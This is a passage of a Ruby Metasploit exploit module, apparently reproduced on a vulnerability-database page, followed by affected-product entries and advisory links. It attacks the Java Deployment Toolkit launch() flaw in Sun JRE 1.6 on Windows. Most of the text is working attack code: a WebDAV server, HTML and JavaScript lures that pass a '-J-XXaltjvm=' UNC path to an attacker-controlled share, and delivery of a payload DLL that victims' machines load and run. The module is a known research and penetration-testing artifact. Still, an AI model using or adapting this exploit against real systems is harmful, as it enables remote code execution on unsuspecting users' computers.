        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 09 2010'
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
      ], self.class)
  end

  def auto_target(cli, request)
    agent = request.headers['User-Agent']
    ret = nil

    #print_status("Agent: #{agent}")

    # Check for MSIE and/or WebDAV redirector requests
    if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
      ret = targets[1]
    elsif agent =~ /MSIE (6|7|8)\.0/
      ret = targets[1]
    else
      print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    ret
  end

  def on_request_uri(cli, request)
    # For this exploit, this does little besides ensures the user agent is a recognized one..
    mytarget = target
    if target.name == 'Automatic'
      mytarget = auto_target(cli, request)
      if (not mytarget)
        send_not_found(cli)
        return
      end
    end

    # Special case to process OPTIONS for /
    if (request.method == 'OPTIONS' and request.uri == '/')
      process_options(cli, request, mytarget)
      return
    end

    # Discard requests for ico files
    if (request.uri =~ /\.ico$/i)
      send_not_found(cli)
      return
    end

    # If there is no subdirectory in the request, we need to redirect.
    if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
      if (request.uri == '/')
        subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
      else
        subdir = request.uri + '/'
      end
      print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
      send_redirect(cli, subdir)
      return
    else
      share_name = $1
    end

    # dispatch WebDAV requests based on method first
    case request.method
    when 'OPTIONS'
      process_options(cli, request, mytarget)
    when 'PROPFIND'
      process_propfind(cli, request, mytarget)
    when 'GET'
      process_get(cli, request, mytarget, share_name)
    when 'PUT'
      print_status("Sending 404 for PUT #{request.uri} ...")
      send_not_found(cli)
    else
      print_error("Unexpected request method encountered: #{request.method}")
    end
  end

  #
  # GET requests
  #
  def process_get(cli, request, target, share_name)
    print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    # dispatch based on extension
    if (request.uri =~ /\.dll$/i)
      #
      # DLL requests sent by IE and the WebDav Mini-Redirector
      #
      print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")

      # Re-generate the payload
      return if ((p = regenerate_payload(cli)) == nil)

      # Generate a DLL based on the payload
      dll_data = generate_payload_dll({ :code => p.encoded })

      # Send it :)
      send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })
    else
      #
      # HTML requests sent by IE and Firefox
      #
      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

      # Always prepare the UNC path, even if we dont use it for this request...
      if (datastore['UNCPATH'])
        unc = datastore['UNCPATH'].dup
      else
        unc = "\\\\" + my_host + "\\" + share_name
      end

      jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
      docbase = rand_text_alphanumeric(8+rand(8))

      # Provide the corresponding HTML page...
      if (request.uri =~ /\.shtml/i)
        print_status("Sending JS version HTML to #{cli.peerhost}:#{cli.peerport}...")

        # Javascript version...
        var_str = rand_text_alpha(8+rand(8))
        var_obj = rand_text_alpha(8+rand(8))
        var_obj2 = rand_text_alpha(8+rand(8))
        var_obj3 = rand_text_alpha(8+rand(8))

        js_jnlp = "http: "
        js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez

        # The 8ad.. CLSID doesn't support the launch method ...
        #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
        clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'

        html = %Q|<html>
<body>Please wait...
<script language="javascript">
var #{var_str} = "#{js_jnlp}";
if (window.navigator.appName == "Microsoft Internet Explorer") {
  var #{var_obj} = document.createElement("OBJECT");
  #{var_obj}.classid = "clsid:#{clsid}";
  #{var_obj}.launch(#{var_str});
} else {
  try {
    var #{var_obj2} = document.createElement("OBJECT");
    #{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    document.body.appendChild(#{var_obj2});
    #{var_obj2}.launch(#{var_str});
  } catch (e) {
    var #{var_obj3} = document.createElement("OBJECT");
    #{var_obj3}.type = "application/java-deployment-toolkit";
    document.body.appendChild(#{var_obj3});
    #{var_obj3}.launch(#{var_str});
  }
}
</script>
</body>
</html>
|

      elsif (request.uri =~ /\.htm/i)
        print_status("Sending non-JS version HTML to #{cli.peerhost}:#{cli.peerport}...")

        clsids = [
          '8AD9C840-044E-11D1-B3E9-00805F499D93',
          'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
        ]
        clsid = clsids[rand(clsids.length)]

        html = %Q|<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0">
<PARAM name="launchjnlp" value="#{jnlp}">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet" width="0" height="0"
  launchjnlp="#{jnlp}" docbase="#{docbase}" />
</body>
</html>
|

      else
        print_status("Sending js detection HTML to #{cli.peerhost}:#{cli.peerport}...")

        # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions
        js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml"
        no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm"

        html = %Q|<html>
<head>
<meta http-equiv="refresh" content="2;#{no_js_uri}" />
</head>
<body>
Please wait...
<script language="javascript">
document.location = "#{js_uri}";
</script>
</body>
</html>
|
      end # end of detection html

      send_response_html(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
    end
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request, target)
    print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    headers = {
      #'DASL'   => '<DAV:sql>',
      #'DAV'    => '1, 2',
      'Allow'  => 'OPTIONS, GET, PROPFIND',
      'Public' => 'OPTIONS, GET, PROPFIND'
    }
    send_response(cli, '', headers)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request, target)
    path = request.uri
    print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
    body = ''

    if (path =~ /\.dll$/i)
      # Response for the DLL
      print_status("Sending DLL multistatus for #{path} ...")
      #<lp1:getcontentlength>45056</lp1:getcontentlength>
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
      # Response for anything else (generally just /)
      print_status("Sending directory multistatus for #{path} ...")
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    else
      print_status("Sending 404 for #{path} ...")
      send_not_found(cli)
      return
    end

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # Make sure we're on the right port/path to support WebDAV
  #
  def exploit
    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
      raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
    end

    super
  end

end

Products Mentioned

Configuration 0

Sun>>Jre >> Version 1.6.0
Microsoft>>Windows >> Version *

Configuration 0

Sun>>Jdk >> Version 1.6.0
Microsoft>>Windows >> Version *

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags: vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39819
Tags: third-party-advisory, x_refsource_SECUNIA
http://sunsolve.sun.com/search/document.do?assetkey=1-66-279590-1
Tags: vendor-advisory, x_refsource_SUNALERT
http://support.apple.com/kb/HT4170
Tags: x_refsource_CONFIRM
http://support.apple.com/kb/HT4171
Tags: x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2010/1191
Tags: vdb-entry, x_refsource_VUPEN